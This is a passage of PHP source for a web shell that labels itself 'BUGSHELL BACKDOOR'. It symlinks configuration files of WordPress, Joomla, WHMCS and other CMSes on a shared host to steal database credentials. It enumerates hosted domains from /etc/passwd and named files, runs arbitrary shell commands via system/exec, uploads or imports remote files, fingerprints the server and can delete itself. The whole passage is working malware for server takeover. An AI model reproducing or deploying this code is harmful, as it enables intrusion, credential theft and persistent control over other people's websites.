1455. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1456. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1457. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
1458. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"pee/".$ms_1[0].'-PhpBB.txt');
1459. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"pee/".$ms_1[0].'-vBulletin.txt');
1460. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1461. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1462. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1463. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"pee/".$ms_1[0].'-Joomla.txt');
1464. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"pee/".$ms_1[0].'-IPB.txt');
1465. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"pee/".$ms_1[0].'-MyBB.txt');
1466. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"pee/".$ms_1[0].'-SMF.txt');
1467. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"pee/".$ms_1[0].'-Drupal.txt');
1468. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"pee/".$ms_1[0].'-e107.txt');
1469. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"pee/".$ms_1[0].'-Seditio.txt');
1470. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"pee/".$ms_1[0].'-osCommerce.txt');
1471. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1472. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1473. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1474. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1475. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1476. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1477. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1478. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1479. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1480. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1481. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1482. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
1483. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); }
1484. }
1485.  
1486. elseif(isset($_REQUEST['symlink'])){
1487. switch ($_REQUEST['symlink']){
1488. case 'var':
1489. if(is_readable("/var/named")){
1490. echo '<div class="coL-panel"><table>
1491. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ VAR/NAMED ]</td></table></div>';
1492. echo '<table class="table-info">';
1493. echo '
1494. <th class="th-info">Website</th>
1495. <th class="th-info" style="width:60px">User</th>
1496. <th class="th-info" style="width:40px">Action</th>';
1497. $ms_5 = scandir("/var/named");
1498. foreach($ms_5 as $ms_6){
1499. if(strpos($ms_6,".db")){
1500. $i += 1;
1501. $ms_6 = str_replace('.db','',$ms_6);
1502. $owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));
1503.  
1504. echo "<tr class='ex-hov'>
1505. <td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$ms_6." '>".$ms_6."</a></td>
1506. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
1507. <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1508.   }
1509. }
1510. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1511. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
1512. }else{ echo "<tr><td class='td-info'>can't read [ /var/named ]</td></table>";
1513.     }
1514. break;
1515. }
1516.  
1517. switch ($_REQUEST['symlink']){
1518. case 'passwd':
1519. error_reporting(0);
1520. $etc = file_get_contents("/etc/passwd");
1521. $etcz = explode("\n",$etc);
1522. if(is_readable("/etc/passwd")){
1523. echo '<div class="coL-panel"><table>
1524. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]</td></table></div>';
1525. echo '<table class="table-info">';
1526. echo '
1527. <th class="th-info">Website</th>
1528. <th class="th-info" style="width:60px">User</th>
1529. <th class="th-info" style="width:40px">Action</th>';
1530. $list = scandir("/var/named");
1531. foreach($etcz as $etz){
1532. $etcc = explode(":",$etz);
1533. foreach($list as $domain){
1534. if(strpos($domain,".db")){
1535. $domain = str_replace('.db','',$domain);
1536. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1537. if($owner['name'] == $etcc[0]) {
1538. $i += 1;
1539. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td>
1540. <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
1541. <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1542. }}}}
1543. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1544. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
1545. break;
1546.     }
1547.  
1548. switch ($_REQUEST['symlink']){
1549. case 'named.conf':
1550. if(is_readable("/etc/named.conf")){
1551. echo '<div class="coL-panel"><table>
1552. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]</td></table></div>';
1553. echo '<table class="table-info">';
1554. echo '
1555. <th class="th-info">Website</th>
1556. <th class="th-info" style="width:60px">User</th>
1557. <th class="th-info" style="width:40px">Action</th>';
1558. $named = file_get_contents("/etc/named.conf");
1559. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1560. foreach($domains[1] as $domain){
1561. $domain = trim($domain);
1562. $i += 1;
1563. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1564. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span>  <a href='http://".$domain." '>".$domain."</a></td><td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1565. }
1566. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1567. Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
1568. } else { echo "<tr><td class='td-info'>can't read [ /etc/named.conf ]</td></tr>"; }
1569. break;
1570. }
1571. switch ($_REQUEST['symlink']){
1572. case 'valiases':
1573. if(is_readable("/etc/valiases")){
1574. echo '<div class="coL-panel"><table>
1575. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]</td></table></div>';
1576. echo '<table class="table-info">';
1577. echo '
1578. <th class="th-info">Website</th>
1579. <th class="th-info" style="width:60px">User</th>
1580. <th class="th-info" style="width:40px">Action</th>';
1581. $list = scandir("/etc/valiases");
1582. foreach($list as $domain){
1583. $i += 1;
1584. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1585. echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a></td><center><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
1586. }
1587. echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
1588. Total Domain : <font color='#1D9D73'>".$i."</font></div>";
1589. } else { echo "<tr><td class='td-info'>can't read [ /etc/valiases ]</td></tr>"; }
1590. break;
1591.     }
1592. }
1593.  
1594. // --- Change Password --- //
1595. elseif($_COEG['command'] == 'change') {
1596. vars('<style> .tup { font-size: 14px; } </style>');
1597. vars('<div class="coL-panel"><table>
1598. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
1599. vars('<script>
1600. function validate(){
1601.             var a = document.getElementById("newpass").value;
1602.            var b = document.getElementById("confirm").value;
1603.            if (a!=b) {');
1604.       s('Password Do Not Match !!');
1605.             vars('return false;
1606.     }
1607. }
1608.     </script>');
1609. function xs($file){
1610.     return file_get_contents($file);
1611. }
1612. function chipt($plain){
1613.         return md5($plain);
1614. }
1615. function changepass($plain){
1616.     $npass = chipt($plain);
1617.     $npass = "\$pass = \"".$npass."\";";
1618.     $con = xs($_SERVER['SCRIPT_FILENAME']);
1619.     $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
1620.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
1621. }
1622.  
1623. if($_COEG['newpass']) {
1624. if(changepass($_COEG['newpass'])) {
1625. success('Password Changed !!');
1626. mtr('?'.x5.$dir.'&'.x7.'logout');
1627. } else {
1628. error('Unable To Change Password !!');
1629.     }
1630. }
1631. echo "<div class='coL-option top'>
1632. <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
1633. <td class='tup' style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
1634. <tr>
1635. <td class='tup' style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
1636. <tr>
1637. <td style='width:120px'></td><td style='width:75%'>
1638. <button type='submit' name='cps' class='btn-exe' onclick='saveForm();return false;' style='width:100px'><i class='fa fa-arrow-circle-right'></i></button></td></table></form></div>";
1639. echo '<script>function saveForm(){
1640. if(document.getElementById("newpass").value == ""){';
1641.        s('Enter New Password !!');
1642.    echo'document.getElementById("newpass").focus();
1643.      return false;
1644.    }
1645. if(document.getElementById("confirm").value == ""){';
1646.       s('Confirm Your Password !!');
1647.    echo'return false;
1648.    }
1649.    document.getElementById("sks").submit();
1650.  }
1651. </script>';
1652. }
1653. elseif($_COEG['command'] == 'kill') {
1654. if(file_exists("underxploit.php"))
1655. unlink("underxploit.php");unlink(__FILE__);
1656.     success('Good Bye Baby :\')');
1657.     mtr('http://underxploit.blogspot.com');
1658. }
1659. elseif($_COEG['command'] == 'renadir') {
1660.    $c = $_COEG['e'];
1661.     if($_COEG['e']) {
1662.         $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
1663.         if($e) {
1664. vars('<script>c("?'.x5.dirname($dir).'");</script>');
1665.     } else {
1666. error('Permission Denied !!');
1667.     }
1668. }
1669. vars('<div class="coL-panel"><table>
1670. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
1671. vars("<div class='coL-option top'>
1672. <br><br><br>
1673.     <center>
1674.         <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
1675. vars("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
1676. <table cellspacing='0'>
1677.     <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
1678.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
1679.     </form></div>");
1680. }
1681. elseif($_COEG['command'] == 'deledir') {
1682. $x0z1 = deledir($dir);
1683.  if($x0z1) {
1684.         vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
1685.     } else {
1686.         vars("<script>window.location = '?".x5.dirname($dir)."';</script>");
1687.         error('Permission Denied !!');
1688.     }
1689. }
1690. elseif($_COEG['command'] == 'about') {
1691.   echo '<div class="coL-panel"><table>
1692. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">ABOUT ME</td></table></div>';
1693. echo '<div class="coL-option" style="padding:7px"><br><br>
1694.     <center><i class="fa fa-bug fa-4x"></i></center><br>
1695. <center><font size="4px" style="shadow:2px 2px 0px #fff">BUGSHELL BACKDOOR</font></font><br><i class="fa fa-globe"></i>&nbsp; http://'.$_SERVER['HTTP_HOST'].'</center><br><br>
1696. </div>
1697.  
1698. <div class="coL-panel top"><table>
1699. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CREDITS</td></table></div>
1700. <table class="table-info">
1701. <tr class="ex-hov">
1702. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Bugshell</td>
1703. <tr class="ex-hov">
1704. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.1 (Prototype)</td>
1705. <tr class="ex-hov">
1706. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
1707. <tr class="ex-hov">
1708. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
1709. <tr class="ex-hov">
1710. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">:  <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
1711. <tr class="ex-hov">
1712. <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
1713. <div class="coL-option">
1714. <center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>&mdash; Thank You &mdash;</center></div>';
1715. }
1716.  
1717. elseif($_COEG['command'] == 'upload') {
1718. vars('<style> .tup { font-size: 14px; } </style>');
1719. echo '<div class="coL-panel"><table>
1720. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
1721. if(isset($_REQUEST['ufile'])) {
1722. $ufile = $_COEG['ufile'] ;
1723. }
1724. if(isset($_REQUEST['upload'])) {
1725. if($_COEG['upload']){
1726. if(empty($ufile)) {
1727.     $cx = $_FILES['file']['name'];
1728. } else {
1729.     $cx = $ufile;
1730. }
1731. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
1732. success('File Uploaded !!');
1733. } else {
1734. error('Upload Failed !!');
1735.           } } }
1736. vars('<script language="Javascript">
1737.         function cogx(){
1738. if(document.forms[\'upload\'].file.value === "") {');
1739.     s('Select Your File !!');
1740.     vars('return false;
1741.     }
1742. }
1743. </script>');
1744. echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
1745. echo '<form enctype="multipart/form-data" name="upload" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
1746. <table style="width:100%">
1747. <td class="tup" style="width:20%">File :</td>
1748. <td style="width:80%">
1749. <input type="file" name="file"></td>
1750. <tr>
1751. <td class="tup" style="width:20%">Name :</td>
1752. <td style="width:80%"><input name="ufile" type="text" placeholder="( Optional )" value="" /></td>
1753. <tr>
1754. <td style="width:20%"></td>
1755. <td style="width:80%"><input type="submit" name="upload" style="width:100px" onclick="return cogx();" value="Upload" class="btn-exe" />
1756. </td></table></form></div>';
1757. if($_COEG["submit"]){
1758. $url = trim($_COEG["url"]);
1759. $uname = $_COEG["uname"];
1760. if(empty($uname)) {
1761.       $uname = basename($url);
1762. } else {
1763.       $uname = $_COEG["uname"];
1764. }
1765. if(op($uname, $url)) {
1766.     success('File Uploaded !!');
1767. } else {
1768.     error('Failed !!');
1769.     }
1770. }
1771. vars('<script language="Javascript">
1772.         function cog(){
1773. if(document.forms[\'import\'].url.value === "") {');
1774.     s('Enter URL !!');
1775.     vars('return false;
1776.     }
1777. }
1778. </script>');
1779. echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet (Import) :<hr>';
1780. echo '<form name="import" action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
1781. echo '<table style="width:100%">
1782. <td class="tup" style="width:20%">Link :</td>
1783. <td style="width:80%"><input type="text" name="url" placeholder="https://pastebin.com/raw/M4bJJtBD" style="width:100%"></td>
1784. <tr>
1785. <td class="tup" style="width:20%">Name :</td>
1786. <td style="width:80%"><input type="text" name="uname" style="width:100%" placeholder="( Optional )"></td>
1787. <tr>
1788. <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" onclick="return cog();" class="btn-exe"></td></table></form></div>';
1789. }
1790. elseif ($_COEG['command'] == 'system') {
1791. function exe($ms_x) {  
1792. if(function_exists('system')) {        
1793.         @ob_start();       
1794.         @system($ms_x);        
1795.         $ms_z = @ob_get_contents();        
1796.         @ob_end_clean();       
1797.         return $ms_z;  
1798.     } elseif(function_exists('exec')) {        
1799.         @exec($ms_x,$values);      
1800.         $ms_z = "";        
1801.         foreach($values as $value) {           
1802.             $ms_z .= $result;      
1803.         } return $ms_z;    
1804.     } elseif(function_exists('passthru')) {        
1805.         @ob_start();       
1806.         @passthru($ms_x);      
1807.         $ms_z = @ob_get_contents();        
1808.         @ob_end_clean();       
1809.         return $ms_z;  
1810.     } elseif(function_exists('shell_exec')) {      
1811.         $ms_z = @shell_exec($ms_x);        
1812.         return $ms_z;  
1813.     }
1814. }
1815. function disk($dz) {
1816. if($dz >= 1073741824)
1817. return sprintf('%1.2f',$dz / 1073741824 ).' GB';
1818. elseif($dz >= 1048576)
1819. return sprintf('%1.2f',$dz / 1048576 ) .' MB';
1820. elseif($dz >= 1024)
1821. return sprintf('%1.2f',$dz / 1024 ) .' KB';
1822. else
1823. return $dz .' B';
1824. }
1825. function fuck($b_ms, $c_ms, $d_ms){
1826.     if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
1827.     if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
1828.     $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
1829.     $e_ms = strpos($b_ms, $d_ms, $a_ms);
1830.     $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
1831.     return $f_ms; }
1832. if(get_magic_quotes_gpc()) {
1833. function m_ms($n_ms) {
1834. return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
1835. $_COEG = m_ms($_COEG); }
1836.  
1837. $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
1838.  
1839. $disablefunc = @ini_get("disable_functions");
1840. $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
1841.  
1842. $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
1843.  
1844. $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
1845.  
1846. $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
1847.  
1848. $python = (exe('python --help')) ? "
1849. <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
1850.  
1851. $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
1852. if(!function_exists('posix_getegid')) {
1853.     $c_us = @get_current_user();
1854.     $c_id = @getmyuid();
1855.     $g_c = @getmygid();
1856.     $gr_p = "?";
1857. } else {
1858.     $c_id = @posix_getpwuid(posix_geteuid());
1859.     $g_c = @posix_getgrgid(posix_getegid());
1860.     $c_us = $c_id['name'];
1861.     $c_id = $c_id['uid'];
1862.     $gr_p = $g_c['name'];
1863.     $g_c = $g_c['gid'];
1864. }
1865. echo '<div class="coL-panel"><table>
1866. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
1867. echo "<table width=100% class='table-info' cellspacing=0>
1868. <th class=th-info style=width:120px><center>Component</center></th>
1869. <th class=th-info><center>Arrow</center></th>
1870. <th class=th-info break><center>Result</center></th></tr>";
1871. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
1872. <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
1873. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
1874. Username</td><td class='td-info' align='center'>&raquo;</td>
1875. <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
1876. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
1877. Group</td><td class='td-info' align='center'>&raquo;</td>
1878. <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
1879. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
1880. Server IP </td><td class='td-info' align='center'>&raquo;</td>
1881. <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
1882. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
1883. Your IP </td><td class='td-info' align='center'>&raquo;</td>
1884. <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
1885. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
1886. PHP Version</td><td class='td-info' align='center'>&raquo;</td>
1887. <td class='td-info'> ".@phpversion()."</td></tr>";
1888. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
1889. <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
1890. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
1891. <td class='td-info'> $safemode</td></tr>";
1892. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
1893. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
1894. Perl</td><td class='td-info' align='center'>&raquo;</td>
1895. <td class='td-info'> $perl </td></tr>";
1896. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
1897. <td class='td-info'>$python</td></tr>";
1898. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
1899. <td class='td-info'>$wget</td></tr>";
1900. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
1901.  if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
1902.   echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
1903. <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
1904. echo "</table>";  
1905. echo '<div class="coL-panel top"><table>
1906. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">KERNEL</td></table></div>';
1907. echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
1908. echo '<div class="coL-panel top"><table>
1909. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
1910. echo "<div class='coL-option wrap break' style='padding:7px'>".$ds_men."</div>";
1911. }
1912. elseif($_COEG['command'] == 'error') {
1913. echo '<div class="coL-panel"><table>
1914. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>';
1915.     error('Permission Denied !!');
1916.     echo x9;
1917. } else {
1918. $hc = @getcwd();
1919. if(isset($_COEG['location']))
1920.     @chdir($_COEG['location']);
1921. $cwd = @getcwd();
1922. if($os == 'win') {
1923.     $hc = str_replace("\\", "/", $hc);
1924.     $cwd = str_replace("\\", "/", $cwd);
1925. }
1926. if($cwd[strlen($cwd)-1] != '/')
1927.     $cwd .= '/';
1928.  
1929. function hs($d) {
1930.     if(function_exists("scandir")) {
1931.         return scandir($d);
1932.     } else {
1933.         $dh  = opendir($d);
1934.         while (false !== ($filename = readdir($dh)))
1935.             $data[] = $filename;
1936.         return $data;
1937.     }
1938. }
1939.   if(!empty($_COOKIE['msv5']))
1940.         $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
1941.      
1942.     if(!empty($_COEG['hcx'])) {
1943.         switch($_COEG['hcx']) {
1944.             case 'mkdir':
1945.                 if(!@mkdir($_COEG['p2']))
1946.                     echo "Can't create new dir";
1947.                 break;
1948.             case 'delete':
1949.                 function deleteDir($path) {
1950.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
1951.                     $dh  = opendir($path);
1952.                     while ( ($â–Ÿ = readdir($dh) ) !== false) {
1953.                         $â–Ÿ = $path.$â–Ÿ;
1954.                         if ( (basename($â–Ÿ) == "..") || (basename($â–Ÿ) == ".") )
1955.                             continue;
1956.                         $type = filetype($â–Ÿ);
1957.                         if ($type == "dir")
1958.                             deleteDir($â–Ÿ);
1959.                         else
1960.                             @unlink($â–Ÿ);
1961.                     }
1962.                     closedir($dh);
1963.                     @rmdir($path);
1964.                 }
1965.                 if(is_array(@$_COEG['msv5']))
1966.                     foreach($_COEG['msv5'] as $f) {
1967.                         if($f == '..')
1968.                             continue;
1969.                         $f = urldecode($f);
1970.                         if(is_dir($f))
1971.                             deleteDir($f);
1972.                         else
1973.                             @unlink($f);
1974.                     }
1975.                 break;
1976.             case 'paste':
1977.                 if($_COOKIE['act'] == 'copy') {
1978.                     function copy_paste($c,$s,$d){
1979.                         if(is_dir($c.$s)){
1980.                             mkdir($d.$s);
1981.                             $h = @opendir($c.$s);
1982.                             while (($f = @readdir($h)) !== false)
1983.                                 if (($f != ".") and ($f != ".."))
1984.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
1985.                         } elseif(is_file($c.$s))
1986.                             @copy($c.$s, $d.$s);
1987.                     }
1988.                     foreach($_COOKIE['msv5'] as $f)
1989.                         copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
1990.                 } elseif($_COOKIE['act'] == 'move') {
1991.                     function move_paste($c,$s,$d){
1992.                         if(is_dir($c.$s)){
1993.                             mkdir($d.$s);
1994.                             $h = @opendir($c.$s);
1995.                             while (($f = @readdir($h)) !== false)
1996.                                 if (($f != ".") and ($f != ".."))
1997.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
1998.                         } elseif(@is_file($c.$s))
1999.                             @copy($c.$s, $d.$s);
2000.                     }
2001.                     foreach($_COOKIE['msv5'] as $f)
2002.                         @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
2003.                 } elseif($_COOKIE['act'] == 'zip') {
2004.                     if(class_exists('ZipArchive')) {
2005.                         $zip = new ZipArchive();
2006.                         if ($zip->open($_COEG['p2'], 1)) {
2007.                             chdir($_COOKIE['location']);
2008.                             foreach($_COOKIE['msv5'] as $f) {
2009.                                 if($f == '..')
2010.                                     continue;
2011.                                 if(@is_file($_COOKIE['location'].$f))
2012.                                     $zip->addFile($_COOKIE['location'].$f, $f);
2013.                                 elseif(@is_dir($_COOKIE['location'].$f)) {
2014.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
2015.                                     foreach ($iterator as $key=>$value) {
2016.                                         $zip->addFile(realpath($key), $key);
2017.                                     }
2018.                                 }
2019.                             }
2020.                             chdir($GLOBALS['cwd']);
2021.                             $zip->close();
2022.                         }
2023.                     }
2024.                 } elseif($_COOKIE['act'] == 'unzip') {
2025.                     if(class_exists('ZipArchive')) {
2026.                         $zip = new ZipArchive();
2027.                         foreach($_COOKIE['msv5'] as $f) {
2028.                             if($zip->open($_COOKIE['location'].$f)) {
